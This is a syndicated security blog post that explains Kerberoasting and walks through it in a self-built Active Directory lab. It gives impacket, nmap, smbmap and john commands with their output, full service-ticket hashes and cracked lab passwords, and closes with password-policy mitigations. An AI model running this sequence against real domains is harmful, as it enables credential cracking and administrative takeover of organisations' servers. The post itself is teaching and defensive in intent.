Roasting Kerberos

Kerberos is a protocol developed by
MIT used to authenticate network
services. It is built using secret-key cryptography and uses a trusted
third-party server called Authentication Server. This protocol
authenticates users and services using tickets. When a client logs in
their identity is authenticated via the Authentication Server (AS).
The AS then forwards the username to a Key Distribution Center (KDC)
that issues a Ticket-Granting Ticket (TGT). this ticket is the
user’s proof of identity.

This is how Kerberos protocol works:

  1. A client sends a request to to the AS soliciting a TGT. This
    request is built using the machine computer time and encrypting it
    with the user’s password hash.

  2. Because the AD (Active Directory) has the user’s password it can
    decrypt the request. The server can then verify the user’s
    authentication data and respond back to the client with a TGT and a
    session key for the TGT.

  3. Because the user now has a valid TGT for the domain, they can send a
    request for a service ticket.

  4. Now the server verifies the validity of the TGT and responds back
    with the service ticket and a service session key.

Kerberoast, discovered by Tim Medin,
works by requesting Kerberos service tickets, TGTs, from the
Authentication Server, AS, which is an action that any valid domain
user can do. These service tickets are a hash that we can crack. We then
have access to our target server which provides us with elevated
privileges or even the ability to impersonate another user.

To do this you need a valid domain user, so any employee of an
organization can exploit this. If you are an anonymous attacker on the
network, there are several ways to obtain user credentials. These
include doing an MDNS spoofing attack on the network
(Responder), an Evil Twin
attack to the wireless network if they have enterprise security or a
phishing email attack that uses an enterprise login with the AD, among

Kerberoast lab

To set up our lab we are going to use Hashicorp’s
Vagrant; the source files are below.
Create a folder with the name kerberoast and save the Vagrantfile
there. Also create another folder inside kerberoast named provision
and save the file ad.ps1 there.

setting up the lab.

$ mkdir kerberoast$ cd kerberoastkerberoast$ nano Vagrantfile #Add here the contentkerberoast$ mkdir provisionkerberoast$ nano provision/ad.ps1 #Add here the content


# -*- mode: ruby -*-# vi: set ft=ruby :Vagrant.configure("2") do |config| = "cdaf/WindowsServerDC"  config.vm.hostname = "winserver" "private_network", ip: ""  config.vm.provision "shell", path: "provision/ad.ps1"end


Import-Module ServerManagerAdd-WindowsFeature RSAT-AD-PowerShellimport-module activedirectoryNew-ADuser -Name "kertest" -SamAccountName kertest -Enabled $true -AccountPassword (ConvertTo-SecureString -AsPlainText "SuperSecure@123!!!" -Force)New-ADuser -Name "svctest" -SamAccountName svctest -Enabled $true -AccountPassword (ConvertTo-SecureString -AsPlainText "Monkey.123" -Force)setspn -A kertestsetspn -A svctestAdd-ADGroupMember -Identity "Administrators" -Members svctestAdd-ADGroupMember -Identity "Users" -Members kertest

Then run the environment using:

vagrant up.

kerberoast$ vagrant up

This will create a Windows machine with Active Directory installed
and configured. At this point, everything we need has been completed and
is ready for us to launch an attack.

Now we can set up our attacking machine. Here we are using Kali
with Vagrant too, but you can use
whatever OS you prefer.

These are the tools that we are going to use:

If you are using Kali the only thing that needs to be installed is
impacket. But first, we need to clone it.

cloning impacket.

git clone

Then go to the folder and install it.

installing impacket.

$ cd impacketimpacket$ pip install -r requirements.txtimpacket$ python

The IP of our target server is, the domain is
and our low privilege domain credentials are

We are ready to go.

Scanning our server

First we need to check the server ports. We can use nmap or ncat to
do it.

port scanning.

nmap -vz 88ncat -vz 445


# Nmap 7.70 scan initiated Tue Aug  6 17:10:43 2019 as: nmap scan report for is up (0.012s latency).Not shown: 991 filtered portsPORT     STATE SERVICE53/tcp   open  domain88/tcp   open  kerberos-sec135/tcp  open  msrpc139/tcp  open  netbios-ssn389/tcp  open  ldap445/tcp  open  microsoft-ds464/tcp  open  kpasswd53268/tcp open  globalcatLDAP3389/tcp open  ms-wbt-server# Nmap done at Tue Aug  6 17:10:54 2019 -- 1 IP address (1 host up) scanned in 10.54 seconds

nc. inverse host lookup failed: Unknown host(UNKNOWN) [] 88 (kerberos) open192.168.56.2: inverse host lookup failed: Unknown host(UNKNOWN) [] 445 (microsoft-ds) open

Kerberos runs on port 88 and SMB runs on port 445; we are going
to use these services to attack the Domain Controller.

Then using smbmap we can check our permissions on the server.

samba low privileges.

smbmap -u kertest -p 'SuperSecure@123!!!' -H -d

smbmap low.

[+] Finding open SMB ports....[+] User SMB session establishd on[+] IP:        Name:        Disk                                                    Permissions        ----                                                    -----------        ADMIN$                                                  NO ACCESS        C$                                                      NO ACCESS        IPC$                                                    READ ONLY        NETLOGON                                                READ ONLY        SYSVOL                                                  READ ONLY

As we can see, our user is a valid domain user, but has no permissions
on the server


Given that we have an active user we can exploit kerberoast to
retrieve TGTs. This is done by simply running:

kerberoast attack.

impacket/examples$ python -dc-ip -save

And when prompted put the password SuperSecure@123!!!.

kerberoast output.

ServicePrincipalName  Name     MemberOf                                   PasswordLastSet       kertest  CN=Users,CN=Builtin,DC=sky,DC=net           2019-08-06 17:06:03  2019-08-06       svctest  CN=Administrators,CN=Builtin,DC=sky,DC=net  2019-08-06 17:06:03  <never>$krb5tgs$23$*kertest$SKY.NET$*$1639e200b950b6e566adad2ce3f3a336$bf5092143c33b1664dc4adb9186ea7f1f29cb0919e4cccc11316fc0824b72cab3c3d573f477c81cbb659d64bb0e156c15796180bbf96cbee9d8e7df8438c449a4aacc8714aec2291ff5d470c6be6dfa2f8844d6c34805e0e56b94d8835efce3faa89ca11972f50cace1929b14ee4491ac82a39623cde0ac85f4af8f11284e968dcd96c6219836a7554b42ab2b1d14c6ca2c9d72416463ad939c180c3c8aea73adcb7985035460bf9cb76f12a4d39d5d5ff05a476262f8505c2bba5e9b24e970214abf6a3af02122f815789a82b7919131b72759f93d1404df918cadf64a265a96ebb5a52794b5b7a6d9460ae0db3a0eaa61b7c79e13a18b97f6fe0bcbfdc199fe57138cc5a28deeb06ecd1fae3d4b2af36378f914eac31832f31a050b7dfb96b79419e20df1b37bc04359590f98e0d51066b54353f61f0a9b406e360ce6cd1f118e564a8fe2bc13c787112167bfccb09ba87af8300563fe8051b4e7ecb260a5af5555308f7cced77327214816201b352d186b2247741e88c2ddd207a59f7f6c4e9aa8f28656e343c1cff65bfb0105e77829613ae766d65c4b31b5f48b3cd47e2d1283b4e37db154c6912057929debd05d1abcbc62af9ec99e787e267cd9e666514504d1d64f34347e5c87f6574d08c205a61a59679854f99db94d43abf4ce3752b24d2b1675a9fd94a9365bc36b67cd86e5e99187d0343cbf71de778411a4e696ce41af8cc47dfd82e8072d2821acee41a95560d2d9d2f84d96bf70d982899dce15e2b5785ed17adde1e1886fbcecea00f57af983213e489479da2182efffdfbf652029c199de60ecc3dc7044f5d2a36a4e8c09dac9f438695d25044ce49e04a906064c16c3e9b9bff1accbe378812cb8ee2266b4a4521cf0f37cbd92fb24227e6316881abc7f79438dd0e5f53b21b830f9b662fb5f0047f1ff710804c38c64376d53731184d8acaa0679c5657b0a5b9aa08bb9539c79d7a445ba93d8ee7297788c1363d8846613de4654ea04d82599d1442c311980dad4fb14a2b6864c1fa831b3bbf6e7c05d3526ecb7470c3b9781a06845c59c5eaf366d99d18cd3f2ae265847b2b013674d874ae584d41a9cc1c5f2b76d17657ab9f4f13f0895fec63973c82a2b8296b3dc6a0bfd6fba9d71c081ed71641f283fd157884f70478c46e73aea8813fc758b3c4d26927a052d754a57682c387f132729e5373bf7fbcd7c724182861d5d7dcd53dfad7bf6cf77838063ddae770ef84de21391acd30bef3fd24$krb5tgs$23$*svctest$SKY.NET$*$0fb0da3f22933a2893a6dac63e87538d$d11bb41bc5f41eeb4890ae74c42bff3ac203c649ef9740e70edb67113723df962b20c1346d82c7e410932944c881d3cb06a7cec0c21278ac1eeb2184867640f39b1ae725c02429ec9068fc6688102d576e4efb9c435f4207882601bff28414ababa2423cc4ea82d64082d8fe4eee797568dd514b4081a5338c08dd279fef2a3ade69efc2fe5502fd0a8e8cd8187761ff4c05322c00484e001832a28242d0c821ce44230eac54e2e4e36c365303ea729505ac9d35d7cc08077d07ea36c72e7ab12a04af392eeddcff37fd2e8a066e779ae26e0658ffa25f35a5c64f456a794676819dda35fe56514c1293f561750532d36a395069c8e98581f2b5d216254d7bed07e95dea36a4817ead880fe405711dae771e1660cadf3902fda1e0b730386aa02bc13bc8051ede7ee5388a919a4c20652ef241c47d66e21d026f5233bbd81dee6f01ad3887c32a9f4f0ab312939edcafa386eba04c32a0826f59b4009bd7fee5f6d78bcdeec80095fb1d0f189a87c26310b562bc4d94ffd19201a0bfa06a208d837a52bade076c2b34b8807f74bf51927b774e9f5047289d0d529beb58712d8eee673db3c77d28882a51bbfcf8dba96677af3b43a109c36b335b70dd0e316cce18877b7704e1ed837875cde1e7a462e35c9fe972318eb6d6d37ea222f00d5e81df343edfc1f50bd8907876c4dc1e77f01d9f5df3cb9e94f231a7a0eeb93aa62c22814742b06596eeb72824b4b0449cf6555fa020345bc21a84595437d50abb7cbe4287f580e47ed302faa9de47b68e9c3cab79ad2b1da17548f39aa8ace12372cb0d9952caee715535654f1f918ad5be3432b954bd7bae753152d919bcb93771fc9daf371ce724b18979f5180955d9ba6573d98f1042df80e5e7532fa96629e1b69f9e556df142fd8b0858243144c9f48a19d1933f280f8366c749fe6fb2b7b6c5f7781994f4d3f32552085ebc35ee4fa122a33978c32e877c0b48bc0cb19840bb7d349bbefb39ef1d062fc901b461a480e92e6121b3060f17c34fe92abad77ffebf687115da10b07081d35ef4a622916b656dd84c92643d477128d0a74a24ab23f69f61c94a7b0483313a31476cedc44a5c9efc55b18c57ebea38984f00e50d5773e25f7c6b3bcbc5ef73bf255ede5397ae334a72409440f8475b1f8b22730a456f81e6b08402c7c795aad026c01ca31b4fd8aac5bade44552787aec9c6b2407d2da24059014efdd88ee1953183f62b2e5e06ed7841438a7d4bd3635672b2

Here we have our TGTs, they are krbtgt hashes, and there we can view
another user on the server svctest. With this, we save that user’s
TGT on a file.

save hash.

echo '$krb5tgs$23$*svctest$SKY.NET$*$0fb0da3f22933a2893a6dac63e87538d$d11bb41bc5f41eeb4890ae74c42bff3ac203c649ef9740e70edb67113723df962b20c1346d82c7e410932944c881d3cb06a7cec0c21278ac1eeb2184867640f39b1ae725c02429ec9068fc6688102d576e4efb9c435f4207882601bff28414ababa2423cc4ea82d64082d8fe4eee797568dd514b4081a5338c08dd279fef2a3ade69efc2fe5502fd0a8e8cd8187761ff4c05322c00484e001832a28242d0c821ce44230eac54e2e4e36c365303ea729505ac9d35d7cc08077d07ea36c72e7ab12a04af392eeddcff37fd2e8a066e779ae26e0658ffa25f35a5c64f456a794676819dda35fe56514c1293f561750532d36a395069c8e98581f2b5d216254d7bed07e95dea36a4817ead880fe405711dae771e1660cadf3902fda1e0b730386aa02bc13bc8051ede7ee5388a919a4c20652ef241c47d66e21d026f5233bbd81dee6f01ad3887c32a9f4f0ab312939edcafa386eba04c32a0826f59b4009bd7fee5f6d78bcdeec80095fb1d0f189a87c26310b562bc4d94ffd19201a0bfa06a208d837a52bade076c2b34b8807f74bf51927b774e9f5047289d0d529beb58712d8eee673db3c77d28882a51bbfcf8dba96677af3b43a109c36b335b70dd0e316cce18877b7704e1ed837875cde1e7a462e35c9fe972318eb6d6d37ea222f00d5e81df343edfc1f50bd8907876c4dc1e77f01d9f5df3cb9e94f231a7a0eeb93aa62c22814742b06596eeb72824b4b0449cf6555fa020345bc21a84595437d50abb7cbe4287f580e47ed302faa9de47b68e9c3cab79ad2b1da17548f39aa8ace12372cb0d9952caee715535654f1f918ad5be3432b954bd7bae753152d919bcb93771fc9daf371ce724b18979f5180955d9ba6573d98f1042df80e5e7532fa96629e1b69f9e556df142fd8b0858243144c9f48a19d1933f280f8366c749fe6fb2b7b6c5f7781994f4d3f32552085ebc35ee4fa122a33978c32e877c0b48bc0cb19840bb7d349bbefb39ef1d062fc901b461a480e92e6121b3060f17c34fe92abad77ffebf687115da10b07081d35ef4a622916b656dd84c92643d477128d0a74a24ab23f69f61c94a7b0483313a31476cedc44a5c9efc55b18c57ebea38984f00e50d5773e25f7c6b3bcbc5ef73bf255ede5397ae334a72409440f8475b1f8b22730a456f81e6b08402c7c795aad026c01ca31b4fd8aac5bade44552787aec9c6b2407d2da24059014efdd88ee1953183f62b2e5e06ed7841438a7d4bd3635672b2' > hashkerber

And then we crack it using john, a SecLists dictionary, and
KoreLogic ruleset.

john cracking.

john --wordlist=/usr/share/seclists/Passwords/darkweb2017-top100.txt --rules=KoreLogic hashkerber

john output.

Using default input encoding: UTF-8Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])Will run 2 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusMonkey.123       (?)1g 0:00:01:09 DONE (2019-08-06 17:15) 0.01446g/s 150941p/s 150941c/s 150941C/s Michae.l118..Asdfgh.jkl24Use the "--show" option to display all of the cracked passwords reliablySession completed

And it’s cracked! Now we can check our access running smbmap again
with our new set of credentials.

samba high privileges.

smbmap -u svctest -p 'Monkey.123' -d -H

admin smbmap.

[+] Finding open SMB ports....[+] User SMB session establishd on[+] IP:        Name:        Disk                                                    Permissions        ----                                                    -----------        ADMIN$                                                  READ, WRITE        C$                                                      READ, WRITE        IPC$                                                    READ ONLY        NETLOGON                                                READ, WRITE        SYSVOL                                                  READ, WRITE        [!] Unable to remove test directory at \\\SYSVOL\edWFuwvkCb, plreae remove manually

As you can see, we now have administrative access on our server. You can
access it by RDP or retrieve files using SMB. Also, you can dump the
SAM to get more users and hashes, these last ones are NTLMv1 and
easily cracked.

Here is the exploitation process.


There is no easy solution because this attack exploits the same
legitimate protocol Kerberos uses. Any user in the domain can exploit
this vulnerability and it is only a matter of time before they crack the

The way to mitigate this is by having and using a strong credential
policy. Passwords must be longer than 20 characters, contain upper and
lower case letters, contain symbols and digits and must not be easy to
guess. This means you would be wise to adopt passphrases instead of
simple passwords.

This is especially useful when you are dealing with service credentials
because they are the ones most targeted. You can also set an alert to
notify you when someone is logged in with your most critical and
high-privileged users.

If you want more information about strong credentials, you can check our
Criteria about them.

*** This is a Security Bloggers Network syndicated blog from Fluid Attacks RSS Feed authored by Jonathan Armas. Read the original post at: